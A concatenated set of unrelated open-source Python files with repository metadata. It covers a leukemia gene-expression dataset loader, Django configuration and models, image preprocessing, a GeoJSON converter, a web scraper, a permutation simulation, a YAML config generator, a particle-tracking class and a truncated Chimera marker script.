class GSE13425Dataset(Dataset):
def __init__(self):
# super() call is voluntarily omitted
filename = r = './data/GSE13425/E-GEOD-13425-processed-data-1721486034.txt'
df = pd.read_csv(filename, sep="\t", header=None)
df = df.dropna() # ignore NaN values
df = df.transpose()
self._X = df.ix[1:, 2:].astype(float).values
self._y = []
self._features_names = df.ix[0, 2:].values
self._parse_features(None)
filenames = df[0][1:].values
self._sample_and_data = r'./data/GSE13425/samples-and-data.csv'
self._parse_labels(filenames)
def _parse_labels(self, filenames):
col_sample_name, col_sample_class = "Scan Name", "Comment [Sample_characteristics]"
df = pd.read_csv(self._sample_and_data, sep="\t", usecols=[col_sample_name, col_sample_class])
df = df.dropna() # ignore NaN values
for f in filenames:
sample_name = f
# get sample label name
label = df[df[col_sample_name] == sample_name][col_sample_class].iloc[0]
self._y.append(label)
# Regroup similar leukemias (11 subtypes into 7 main types of leukemia)
self._y = self._regroup_similar_leukemias(self._y)
def _parse_features(self, filename):
# idx -> name : nothing to do, done in __init__()
# name -> idx
self._features_indices = {feature: idx for (idx, feature) in enumerate(self._features_names)}
@staticmethod
def _regroup_similar_leukemias(_y):
"""
Regroup similars leukemias together. There is about 18 sub types of leukemias in this dataset. There are
derived from the 4 main types of leukemia which are AML, CML, ALL and CLL.
Example :
:param _y: original classes from the dataset
:return: regrouped classes with the 4 main types of leukemia
"""
return map(translate_subtype_into_maintype_class, _y)
leukemia_types_lookup_table = {
"ALL-Hyperdiploid": [
"Precursor-B ALL, subtype: Hyperdiploid"
],
"ALL-ABL": [
"Precursor-B ALL, subtype: BCR-ABL",
"Precursor-B ALL, subtype: BCR-ABL (+hyperdiploidy)"
],
"ALL-E2A-rearranged": [
"Precursor-B ALL, subtype: E2A-rearranged (E-sub)",
"Precursor-B ALL, subtype: E2A-rearranged (E)",
"Precursor-B ALL, subtype: E2A-rearranged (EP)"
],
"ALL-MLL": [
"Precursor-B ALL, subtype: MLL"
],
"ALL-other": [
"Precursor-B ALL, subtype: other"
],
"ALL-TEL-AML1": [
"Precursor-B ALL, subtype: TEL-AML1",
"Precursor-B ALL, subtype: TEL-AML1 (+hyperdiploidy)"
],
"ALL": [
"T-ALL"
]
}
def translate_subtype_into_maintype_class(subtype):
for k, v in leukemia_types_lookup_table.iteritems():
if subtype in leukemia_types_lookup_table[k]:
return k
# in the case we do not find a matching type, we keep the original subtype
return subtype
if __name__ == '__main__':
os.chdir("../..")
ds = GSE13425Dataset()
best_features_idx = [4, 10, 2]
best_features_names = ds.get_features_names(best_features_idx)
print(best_features_names)
print("----")
y = list(set(ds.get_y()))
print(y)
print(len(y))
| [
"[email protected]"
] | |
10f95e7b16db7916e3cdc3c061750179de5cfdb0 | 3a8a3f07b75bdf508b8edc87b1239077afce4bce | /djangophx/wsgi.py | 417e400e892c60c2760fbb4e1b170278de2147cd | [
"MIT"
] | permissive | djangophx/djangophx-web | 5ba5c167d57dc85d17d8f9acbe81f9e389b3c8f4 | 974df5b461f96e5291b14f04567b9aac283766da | refs/heads/master | 2020-12-31T00:53:15.813272 | 2017-01-31T22:33:28 | 2017-01-31T22:51:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | """
WSGI config for djangophx project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
from __future__ import absolute_import, unicode_literals
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangophx.settings.dev")
application = get_wsgi_application()
| [
"[email protected]"
] | |
06bc48d4bc287fb3d1caae1b82df7092d6343645 | ed7c28b78e39f607e122f62b4c008661643385ae | /Message/urls.py | cdebab595981258e09d774fde4db06756f10d1c2 | [] | no_license | basu-dev/MobileVersionRaven | 507d0226fc0cc95ab5bd21ebebf6813e532fb1e4 | a1aa66a2bc9541c9fbbfbfa97fddfb6adea273e5 | refs/heads/master | 2020-07-01T07:30:56.554113 | 2019-08-05T15:58:28 | 2019-08-05T15:58:28 | 201,090,203 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | from django.urls import path
from . import views
urlpatterns=[
path('',views.message_list),
path('message/<int:id>/',views.chatroom),
path('save_message/<int:id>/',views.save_message),
]
| [
"[email protected]"
] | |
1f804536a86d59b90964fd47c07595a61a7c1fb8 | 44678e46766332e715c09ebd4bd93c57d75d650a | /part2/5-human-pose-estimation-onnx/aws_deployment/s5-hpe-onnx-aws/utils/hpe_transform_utils.py | b54aface0aa2ae8f8f1b8cd597aeacb29dda780e | [] | no_license | birender-panwar/vision-ai | ff3368c07adbf6760e11a8c764e66877c96b20d6 | 11b44e42e08bab534b3a41bfef4ebcc9a772fde2 | refs/heads/main | 2022-12-28T18:40:22.955969 | 2020-10-18T10:59:53 | 2020-10-18T10:59:53 | 304,915,469 | 0 | 1 | null | 2020-10-18T05:00:24 | 2020-10-17T16:02:37 | null | UTF-8 | Python | false | false | 1,058 | py |
import numpy as np
import PIL
def img_normalize(img, means, stds):
"""
Args:
Numpy : Image of size (C, H, W) to be normalized.
Returns:
Numpy: Normalized image.
"""
for i in range(3):
img[i] = np.divide(np.subtract(img[i], means[i]), stds[i])
img[i] = np.nan_to_num(img[i])
return img
def HWC_2_CHW(img):
H, W, C = img.shape
im = np.zeros((C,H,W),dtype=np.float32)
for i in range(C):
im[i] = img[:,:,i]
return im
# img: PIL Image data
def transform_image(img:PIL):
img = img.resize((256,256), PIL.Image.BICUBIC) # resizing image
img = np.asarray(img)
# converting from HWC to CHW format
img_chw = HWC_2_CHW(img)
# Convert image to floating point in the range 0 to 1
img_chw = np.float32(img_chw)/255.0
# Normalizing image data
means, stds = [0.485, 0.456, 0.406], [0.229, 0.224, 0.225]
img_chw = img_normalize(img_chw, means, stds)
img_chw = np.expand_dims(img_chw, axis=0) # Making batch size of 1
return img_chw
| [
"[email protected]"
] | |
95cc14cdf4a2934e17ff077a41433ca964850f07 | 8afb5afd38548c631f6f9536846039ef6cb297b9 | /GIT-USERS/amitness/maptools/geo/set_province_geo_properties_from_oknp.py | dafa719280d1c97b63ddefc7733031115fe807d1 | [
"MIT"
] | permissive | bgoonz/UsefulResourceRepo2.0 | d87588ffd668bb498f7787b896cc7b20d83ce0ad | 2cb4b45dd14a230aa0e800042e893f8dfb23beda | refs/heads/master | 2023-03-17T01:22:05.254751 | 2022-08-11T03:18:22 | 2022-08-11T03:18:22 | 382,628,698 | 10 | 12 | MIT | 2022-10-10T14:13:54 | 2021-07-03T13:58:52 | null | UTF-8 | Python | false | false | 2,055 | py | import getopt
import json
import re
import sys
"""
Script to manipulate the properties of each VDC in the vdc_oknp.geojson file
in the geo repository and convert each to the format needed for NepalMap output as vdc.geojson
"""
def convert_json(input_file, output_file):
with open(input_file, "r") as data_file:
data = json.load(data_file)
def build_wazimap_feature(feature):
old_type = feature["type"]
old_geometry = feature["geometry"]
old_properties = feature["properties"]
code = str(old_properties["D_ID"])
name = str(old_properties["Title"])
new_properties = {
"code": code,
"name": name,
"geoid": "{}-{}".format("province", code),
"level": "province",
}
return {
"type": old_type,
"geometry": old_geometry,
"properties": new_properties,
}
features = list(map(lambda f: build_wazimap_feature(f), data["features"]))
len(features)
new_collection = dict(type=data["type"], features=features)
with open(output_file, "w") as json_out:
json.dump(new_collection, json_out, ensure_ascii=False)
print("Done!")
def main(args):
inputjson = ""
outputjson = ""
try:
opts, args = getopt.getopt(args, "hi:o:", ["inputjson=", "outputjson="])
except getopt.GetoptError:
print("python set_province_geo_properties.py -i <inputjson> -o <outputjson>")
sys.exit(2)
for opt, arg in opts:
if opt == "-h":
print(
"python set_province_geo_properties.py "
"-i <inputjson> "
"-o <outputjson>"
)
sys.exit()
elif opt in ("-i", "--inputjson"):
inputjson = arg
elif opt in ("-o", "--outputjson"):
outputjson = arg
convert_json(inputjson, outputjson)
if __name__ == "__main__":
main(sys.argv[1:])
| [
"[email protected]"
] | |
8d7b72953bd990794b6c55c952c15b2bb38d0103 | de2a58f593b1955550bd49ce512353b7561723f5 | /Scrapper.py | d18002d65c0b97250d322a9a39cf377001320bba | [] | no_license | antonymwangig/start | d687dad738bfc5421bade7bfeeddeef8d36f3849 | 9042e6caff6592d143256816e5bbbf7ca4614a36 | refs/heads/master | 2021-05-14T11:55:22.310711 | 2018-01-05T14:39:13 | 2018-01-05T14:39:13 | 116,393,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,160 | py | from bs4 import BeautifulSoup
from Urls import Url
from Keywords import keywords
class Scrap:
def __init__(self,response,currentHost):
self.response=response
if currentHost.endswith("/"):
self.currentHost=currentHost[:-1]
else:
self.currentHost=currentHost
self.soup=BeautifulSoup(response)
self.CheckForUrl()
self.CheckData()
def CheckForUrl(self):
links=self.soup.find_all("a")
for link in links:
try:
Url_link=str(link.get("href"))
if Url_link.startswith("http://") or Url_link.startswith("https://"):
Url().SetUrlToVisit(Url_link)
elif Url_link.startswith("www"):
Url().SetUrlToVisit("http://"+Url_link)
elif Url_link.startswith("/"):
#Url().SetUrlToVisit(self.currentHost+Url_link)
pass
except:
pass
def CheckData(self):
all_tags=self.soup.body.find_all_next()
#print(all_tags)
count=0
for tag in all_tags:
# print("\n\n\n\n"+str(tag))
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).div.attrs
if keywords().isPriceKeyword(dict_tags):
#print(BeautifulSoup(str(tag)).div.find_all_next())
# if len(BeautifulSoup(str(tag)).div.find_all_next())>2:
c=count
while c>0:
soup2=BeautifulSoup("""<p><div>{}</div></p>""".format(str(all_tags[c])))
all_tags2=soup2.div.find_all_next()
print("")
if self.CheckPrice(all_tags2) and self.CheckProduct(all_tags2):
print(all_tags2.string)
break
c=c-1
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).span.attrs
if keywords().isPriceKeyword(dict_tags):
# if len(BeautifulSoup(str(tag)).div.find_all_next())>2:
c=count
while c>0:
soup2=BeautifulSoup("""<p>{}</p>""".format(str(all_tags[c])))
all_tags2=soup2.p.find_all_next()
print("\n\n\n"+str(all_tags2))
if self.CheckPrice(all_tags2) and self.CheckProduct(all_tags2):
print(all_tags2.string)
break
c=c-1
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).dt.attrs
if keywords().isPriceKeyword(dict_tags):
# if len(BeautifulSoup(str(tag)).div.find_all_next())>2:
c=count
while c>0:
soup2=BeautifulSoup("""<p><div>{}</div></p>""".format(str(all_tags[c])))
all_tags2=soup2.dt.find_all_next()
if self.CheckPrice(all_tags2) and self.CheckProduct(all_tags2):
print(all_tags2.string)
break
c=c-1
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).dd.attrs
if keywords().isPriceKeyword(dict_tags):
# if len(BeautifulSoup(str(tag)).div.find_all_next())>2:
c=count
while c>0:
soup2=BeautifulSoup("""<p><div>{}</div></p>""".format(str(all_tags[c])))
all_tags2=soup2.dd.find_all_next()
if self.CheckPrice(all_tags2) and self.CheckProduct(all_tags2):
print(all_tags2.string)
break
c=c-1
except:
pass
count=count+1
def CheckProduct(self,all_tags2):
for tag in all_tags2:
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).div.attrs
if keywords().isProductKeyword(dict_tags):
return True
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).span.attrs
if keywords().isProductKeyword(dict_tags):
return True
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).dt.attrs
if keywords().isProductKeyword(dict_tags):
return True
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).dd.attrs
if keywords().isProductKeyword(dict_tags):
return True
except:
pass
return False
def CheckPrice(self,all_tags2):
for tag in all_tags2:
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).div.attrs
if keywords().isPriceKeyword(dict_tags):
return True
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).span.attrs
if keywords().isPriceKeyword(dict_tags):
return True
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).dt.attrs
if keywords().isPriceKeyword(dict_tags):
return True
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).dd.attrs
if keywords().isPriceKeyword(dict_tags):
return True
except:
pass
return False
| [
"[email protected]"
] | |
f97bc904b7b78adaeac41e756b9d7ccf05ea023f | 74877cb0c82e46265f62991b07a55618e7691afd | /permutation_based_simulation/permutation_based_simulation.py | e1dd5594ad9b9a917b3d5c4756eb8f3f83bf87a5 | [
"MIT"
] | permissive | hmmhdnr/molecular_network_analysis_multidimentional_vector | 230422fc4ede31439565bee15ce3306c89c9e49e | 3a79bf3b6bb3a80e82bc035c51a32d35d328bb6d | refs/heads/main | 2023-04-18T08:50:56.204133 | 2021-07-06T04:43:28 | 2021-07-06T04:43:28 | 383,046,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,196 | py | import pandas as pd
from itertools import groupby
from multiprocessing import Pool
import time
import datetime
import os
import random
# permutation-based simulation
# 2021/5/27 by H.Homma
ListSize = 1965
Size_A = 73
Size_B = 62
Expected_Overwrap_Size = 43
bootstrap_N = 10000
Dir_output = 'result_from_all_proteins'
cpu_count = min(16, os.cpu_count())
TaskID = 0
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--task_id", help="Task ID for parallel", type=int)
parser.add_argument("--size_a", help="size of list_A", type=int)
parser.add_argument("--size_b", help="size of list_B", type=int)
parser.add_argument("--population_size", help="size of population", type=int)
parser.add_argument("-B", help="number of bootstrap trials", type=int)
parser.add_argument("-E", help="Expected overwrap size", type=int)
parser.add_argument("-d", help="output directory", type=str)
args = parser.parse_args()
if args.task_id is not None:
TaskID = args.task_id
if args.size_a is not None:
Size_A = args.size_a
if args.size_b is not None:
Size_B = args.size_b
if args.population_size is not None:
ListSize = args.population_size
if args.B is not None:
bootstrap_N = args.B
if args.E is not None:
Expected_Overwrap_Size = args.E
if args.d is not None:
Dir_output = args.d
if not os.path.isdir(Dir_output):
os.makedirs(Dir_output)
def init(_a, _b, _l):
global A, B, ALL
A = _a
B = _b
ALL = _l
def split_iter(iterable, N=3):
for i, item in groupby(enumerate(iterable), lambda x: x[0] // N):
yield (x[1] for x in item)
def overwrap_ratio(idx):
la = random.sample(range(ALL), A)
lb = random.sample(range(ALL), B)
intersect = sorted(list(set(la) & set(lb)))
union = sorted(list(set(la) | set(lb)))
return idx, len(la), len(lb), len(intersect), len(union), len(intersect)/len(union), ','.join([str(x) for x in intersect]), ','.join([str(x) for x in union])
def overwrap_ratio_wrapper(args):
return overwrap_ratio(*args)
if __name__ == '__main__':
expected_list_size = Size_A + Size_B - Expected_Overwrap_Size
expected_ratio = Expected_Overwrap_Size / expected_list_size
print("bootstrap size_A = %d, size_B = %d from population of size %d" % (Size_A, Size_B, ListSize))
print("expected list size = %d, expected overwrap size = %d, expected overwrap ratio = %f" % (expected_list_size, Expected_Overwrap_Size, expected_ratio))
pool = Pool(cpu_count, initializer=init, initargs=(Size_A, Size_B, ListSize))
result = pool.map(overwrap_ratio, range(bootstrap_N))
x = pd.DataFrame(result, columns=['index', 'size_a', 'size_b', 'size_intersect', 'size_union', 'overwrap_ratio', 'intersection', 'union']).set_index('index')
x.to_csv(os.path.join(Dir_output, "permutation_result_for_core_network_task%d.tsv" % TaskID), sep='\t')
ratios = x.loc[:,"overwrap_ratio"]
r = [o for o in ratios if o >= expected_ratio]
print("%d samples were greater than or equal to the expected value" % len(r))
print("probability of expected ratio (%f) is %f for %d bootstrap samples" % (expected_ratio, len(r)/len(ratios), len(ratios)))
pool.close()
pool.terminate()
| [
"[email protected]"
] | |
8714f66bb60c609dd43c55d3d0061cde1805382b | 1141cd4aeffafe496bb7d8a1399ca7c8445edd6e | /tests/ui_tests/test_field_ui_options_data/config_generator.py | f1f37c951a3276fe66171bfd21965f2c0877d79b | [
"Apache-2.0"
] | permissive | amleshkov/adcm | d338c3b7c51e38ffe9a0b2715c85e54bed0c4f46 | e1c67e3041437ad9e17dccc6c95c5ac02184eddb | refs/heads/master | 2020-11-30T15:35:57.456194 | 2019-12-16T20:27:06 | 2019-12-16T20:27:06 | 230,432,278 | 0 | 0 | NOASSERTION | 2019-12-27T11:30:23 | 2019-12-27T11:30:22 | null | UTF-8 | Python | false | false | 3,115 | py | import os
import yaml
DATA = [("invisible", "true", "advanced", "true"), ("invisible", "false", "advanced", "false"),
("invisible", "false", "advanced", "true"), ('invisible', "true", "advanced", "false")]
TYPES = ("string", "password", "integer", "text", 'boolean', 'float', 'option', 'list', 'map', 'json', 'file')
template_textboxes = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default: {4}
ui_options:
{0}: {1}
{2}: {3}
"""
template_password = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default: password
ui_options:
{0}: {1}
{2}: {3}
"""
template_text = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default: text
ui_options:
{0}: {1}
{2}: {3}
"""
template_numbers = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default: 1
ui_options:
{0}: {1}
{2}: {3}
"""
template_boolean = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default: true
ui_options:
{0}: {1}
{2}: {3}
"""
template_file = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
ui_options:
{0}: {1}
{2}: {3}
"""
template_json = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default: {{}}
ui_options:
{0}: {1}
{2}: {3}
"""
template_map = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default:
name: Joe
age: "24"
sex: m
ui_options:
{0}: {1}
{2}: {3}
"""
template_list = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default:
- /dev/rdisk0s1
- /dev/rdisk0s2
- /dev/rdisk0s3
ui_options:
{0}: {1}
{2}: {3}
"""
template_option = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
option: {{http: 80, https: 443}}
default: 80
ui_options:
{0}: {1}
{2}: {3}
"""
TEMPLATES = {"string": template_textboxes, "password": template_password, "integer": template_numbers,
"text": template_text, 'boolean': template_boolean, 'float': template_numbers,
'option': template_option, 'list': template_list, 'map': template_map,
'json': template_json, 'file': template_file}
for t in TYPES:
for config in DATA:
d_name = "{}_{}/{}_{}/{}".format(config[0], config[1], config[2], config[3], t)
os.makedirs(d_name)
tmpl = ''
with open("{}/config.yaml".format(d_name), "w+") as f:
f.write(TEMPLATES[t].format(config[0], config[1], config[2], config[3], t))
| [
"[email protected]"
] | |
47aefb1dc88c20f09ca380b4a5f6ac27436692b7 | f238ec97ddc6922d0888eb625281a91209ab8c6c | /google_yoda/yoda_speak/models.py | 4aafb2ec8cabf6ce8f18cbfbcd64d6d4e6cd2ef7 | [
"MIT"
] | permissive | loganmurphy/unit-integration-tests | 1c973f3c2955d7af6a1955e48f61d6e5e1ed700a | 3af12e3f956a501422bc6686b3deb0bc815a0610 | refs/heads/master | 2021-08-30T03:41:40.394459 | 2017-12-15T22:34:30 | 2017-12-15T22:34:30 | 114,272,900 | 0 | 0 | null | 2017-12-14T16:27:54 | 2017-12-14T16:27:54 | null | UTF-8 | Python | false | false | 651 | py | from django.db import models
from django.conf import settings
class Padawan(models.Model):
userID = models.CharField(max_length=250, unique=True)
def __str__ (self):
return self.userID
class YodaPhrase(models.Model):
phrase = models.TextField(null=True)
translation = models.TextField(null=True)
url = models.CharField(max_length=250, blank=True, null=True)
jedi = models.BooleanField(default=False)
sith = models.BooleanField(default=False)
created = models.DateTimeField(auto_now_add=True)
padawan = models.ForeignKey(Padawan, on_delete=models.CASCADE)
def __str__ (self):
return self.phrase
| [
"[email protected]"
] | |
73737bf81e75478db35f9ca61995da66cdf0d9c2 | 769db2120993c3d02531c41bb3daae976647a28b | /simpletrack/particles.py | 951a9f123031237e14776d02e4a20170cff9e039 | [] | no_license | giadarol/simpletrack | 3fbffee63bfa8b0f3172dd7b678c99bdc7349b1f | fb39d2726af4a4092100215664a11a2cde2639be | refs/heads/master | 2020-04-06T23:23:42.258911 | 2018-11-16T14:36:40 | 2018-11-16T14:36:40 | 157,867,458 | 0 | 0 | null | 2018-11-16T12:54:27 | 2018-11-16T12:54:27 | null | UTF-8 | Python | false | false | 5,529 | py | import numpy as np
from cobjects import CBuffer, CObject, CField
## chi = q/q_0 m_0/m
## rmass = m_0/m
## rchange = q/q_0
## px = P/P0 m_0 / m
class Particles(CObject):
pmass=938.272046e6
_typeid=0
def _set_p0c(self):
energy0=np.sqrt(self.p0c**2+self.mass0**2)
self.beta0=self.p0c/energy0
def _set_delta(self):
rep=np.sqrt(self.delta**2+2*self.delta+1/self.beta0**2)
irpp=1+self.delta
self.rpp=1/irpp
beta=irpp/rep
self.rvv=beta/self.beta0
# memory layout
nparticles=CField(0,'int64',const=True)
mass0 =CField( 1,'float64',length='nparticles',default=pmass)
p0c =CField( 2,'float64',length='nparticles',default=0,setter=_set_p0c)
beta0 =CField( 3,'float64',length='nparticles',default=1)
charge0=CField( 4,'float64',length='nparticles',default=1)
#s
x =CField( 5,'float64',length='nparticles',default=0)
px =CField( 6,'float64',length='nparticles',default=0)
y =CField( 7,'float64',length='nparticles',default=0)
py =CField( 8,'float64',length='nparticles',default=0)
zeta =CField( 9,'float64',length='nparticles',default=0)
delta =CField(10,'float64',length='nparticles',default=0,setter=_set_delta)
#psisgma
rpp =CField(11,'float64',length='nparticles',default=1)
rvv =CField(12,'float64',length='nparticles',default=1)
rmass =CField(13,'float64',length='nparticles',default=1)
rcharge=CField(14,'float64',length='nparticles',default=1)
chi =CField(15,'float64',length='nparticles',default=1)
partid =CField(16,'int64',length='nparticles',default=0)
turns =CField(17,'int64',length='nparticles',default=0)
islost =CField(18,'int64',length='nparticles',default=0)
#elemid
def __init__(self,cbuffer=None,nparticles=0, partid=None,**nargs):
if partid is None:
partid=np.arange(nparticles)
CObject.__init__(self,cbuffer=cbuffer,
nparticles=nparticles,
partid=partid,
**nargs)
@classmethod
def _gen_opencl_copyparticle(cls):
idx=cls.mass0.index
types={'float64':'f64','int64':'i64'}
out=["""void copy_particle_from(__global slot_t *particles_p,
size_t ipart,
Particle *particle){
size_t npart =particles_p[0].i64;"""]
for name,field in cls.get_fields():
if field.index>=idx:
ctype=f"{types[field.ftype]}"
data=f"particles_p[{idx}+{field.index-idx}*npart+ipart]"
out.append(f" particle->{name:7} ={data}.{ctype} ;")
out.append('};')
print('\n'.join(out))
out=["""void copy_particle_to(__global slot_t *particles_p,
size_t ipart,
Particle *particle){
size_t npart =particles_p[0].i64;"""]
for name,field in cls.get_fields():
if field.index>=idx:
ctype=f"{types[field.ftype]}"
data=f"particles_p[{idx}+{field.index-idx}*npart+ipart]"
out.append(f" {data}.{ctype}= particle->{name:7};")
out.append('};')
print('\n'.join(out))
@classmethod
def _gen_cpu_copyparticle(cls):
types={'float64':'f64','int64':'i64'}
out=["""void copy_single_particle_to(slot_t * restrict part_dst_p,
size_t ipart_dst,
Particle * restrict part_src_p
size_t ipart_src){
size_t npart_dst =part_dst_p[0].i64;
size_t npart_src =part_src_p[0].i64;"""]
idx=cls.mass0.index
for name,field in cls.get_fields():
if field.index>=idx:
#ctype=f"{types[field.ftype]}"
dst=f"part_dst_p[{idx}+{field.index-idx}*npart_dst+ipart_dst]"
src=f"part_src_p[{idx}+{field.index-idx}*npart_src+ipart_src]"
out.append(f" {dst} =")
out.append(f" {src} ;")
out.append('};')
print('\n'.join(out))
@classmethod
def _gen_opencl_particle_type(cls):
idx=cls.mass0.index
types={'float64':'double','int64':'long'}
out=["typedef struct {"]
for name,field in cls.get_fields():
if field.index>=idx:
out.append(f" {types[field.ftype]} {name};")
out.append('} Particle;')
out.append("\n#define PARTICLE_GET(p,name) p.name")
print('\n'.join(out))
@classmethod
def _gen_common_particle_slots(cls):
idx=cls.mass0.index
types={'float64':'REAL','int64':'INT'}
out=['#define PARTICLE_SLOTS \\']
for name,field in cls.get_fields():
if field.index>=idx:
ctype=types[field.ftype]
cdef=f" {ctype}({name});"
out.append(f" {cdef:23}\\")
print('\n'.join(out))
@classmethod
def _gen_common_particle_accessors(cls):
idx=cls.mass0.index
out=[]
for name,field in cls.get_fields():
if field.index>=idx:
fdef=f"#define {name.upper()}(p)"
out.append(f"{fdef:18} PARTICLE_GET(p,{name})")
print('\n'.join(out))
class ParticlesSet(object):
def __init__(self):
self.cbuffer=CBuffer()
self.particles=[]
def Particles(self,**nargs):
particles=Particles(cbuffer=self.cbuffer,**nargs)
self.particles.append(particles)
return particles
| [
"[email protected]"
] | |
f4c16df479c41d875d6923316633e762a7e5f3e6 | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_25586.py | 426c1d73a6457108e12822fce4bf72e82f3f2a37 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,844 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((501.532, 478.427, 560.203), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((444.882, 505.913, 539.923), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((377.42, 530.991, 500.137), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((428.595, 403.803, 470.526), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((228.378, 631.865, 420.858), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((469.862, 500.665, 534.635), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((470.928, 500.729, 534.488), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((477.695, 484.859, 512.821), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((504.745, 480.911, 507.128), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((528.287, 488.878, 493.665), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((549.208, 504.897, 483.271), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((532.188, 522.11, 469.412), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((481.641, 496.449, 560.252), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((586.291, 552.006, 383.014), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((405.777, 641.567, 367.333), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((405.777, 641.567, 367.333), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
